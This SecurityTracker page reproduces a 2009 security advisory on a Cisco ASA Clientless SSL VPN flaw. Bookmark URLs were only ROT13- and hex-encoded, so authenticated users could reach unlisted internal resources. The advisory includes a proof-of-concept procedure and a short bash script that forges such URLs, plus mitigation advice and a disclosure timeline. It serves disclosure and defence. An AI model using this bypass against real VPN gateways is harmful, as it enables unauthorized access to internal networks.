SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Device (Firewall)  >   Cisco ASA Vendors:   Cisco
Cisco ASA WebVPN Bookmark List Can Be Bypassed By Remote Authenticated Users
SecurityTracker Alert ID:  1023368
SecurityTracker URL:  http://securitytracker.com/id/1023368
CVE Reference:   CVE-2009-4455   (Links to External Site)
Updated:  Dec 31 2009
Original Entry Date:  Dec 17 2009
Impact:   Host/resource access via network
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 8.x and prior versions
Description:   David Eduardo Acosta Rodriguez of ISecAuditors reported vulnerability in Cisco ASA. A remote authenticated user can bypass the WebVPN bookmark list to access ostensibly protected resources on the internal network.

A remote authenticated Clientless SSL VPN user can send a specially crafted URL to access internal network resources that are not listed on the WebVPN home page.

Cisco has assigned Bug ID CSCtd73211 to this vulnerability.

The vendor was notified on December 9, 2009.

[Editor's note: The vendor does not consider the WebVPN bookmark feature to be an access control feature.]

Impact:   A remote authenticated user can access ostensibly protected resources on the internal network.
Solution:   No solution was available at the time of this entry.

The vendor's advisory is available at:

http://tools.cisco.com/security/center/viewAlert.x?alertId=19609

Vendor URL:  www.cisco.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Thu, 17 Dec 2009 13:48:41 +0100
Subject:  [ISecAuditors Security Advisories] Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-013
- Original release date: December 7th, 2009
- Last revised: December 16th, 2009
- Discovered by: David Eduardo Acosta Rodriguez
- Severity: 4/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

II. BACKGROUND
-------------------------
Cisco VPN SSL [1] is a module for Cisco ASA and Cisco Integrated
Services Routers to extend network resources to virtually any remote
user with access to the Internet and a web browser.

III. DESCRIPTION
-------------------------
Cisco VPN SSL Clientless lets administrators define rules to specific
targets within the private network that WebVPN users will be able to
access. This specific targets are published using links in VPN SSL
home page. These links (URL) are protected (obfuscated) using a ROT13
substitution[2] and converting ASCII characters to hexadecimal. An
user with a valid account and without "URL entry" can access any
internal/external resource simply taken an URL, encrypt with ROT 13,
convert ASCII characters to hexadecimal and appending this string to
Cisco VPN SSL URL.

IV. PROOF OF CONCEPT
-------------------------
Using URL http://intranet published on internal server (not accessible
from home page):
1. Convert string to ROT13: uggc://vagenarg
2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
3. Append string to Cisco VPN SSL:
https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++

This is a simple PoC for easy demonstration:

#!/bin/bash
echo -n "write URL:"
read a
b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]' | od
-tx1 | cut  -c8- | sed 's/ //g'` | paste -s -d '';
echo -n "URL "
echo -n "https://[CISCOVPNSSL]/+CSCO+00"; echo -n $b; echo -n "++";
echo "";

V. BUSINESS IMPACT
-------------------------
Users with valid account can surf to internal/external resources,
bypassing controls in home page.

VI. SYSTEMS AFFECTED
-------------------------
Cisco ASA <= 8.x are vulnerable.

VII. SOLUTION
-------------------------
Always set "webtype" ACL and "filter" to block access in Web VPN SSL
(not activated by default). Included in Cisco site now.
Follow recommendations from "Cisco Understanding Features Not
Supported in Clientless SSL VPN" [3].

VIII. REFERENCES
-------------------------
[1] www.cisco.com/web/go/sslvpn
[2] http://en.wikipedia.org/wiki/ROT13
[3] http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/
guide/webvpn.html#wp999589
http://tools.cisco.com/security/center/viewAlert.x?alertId=19609
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by
David Eduardo Acosta Rodríguez (deacosta (at) isecauditors (dot) com,
                                dacosta (at) computer (dot) org).
Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com))
for additional research.

X. REVISION HISTORY
-------------------------
December   7, 2009: Initial release.
December  16, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
December   9, 2009: Vendor contacted
December   9, 2009: Vendor response, they include our mitigation
                    proposal in their website and start the analysis
                    of correction required.
December  16, 2009: Vendor confirms remediation and public statement.
December  17, 2009: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC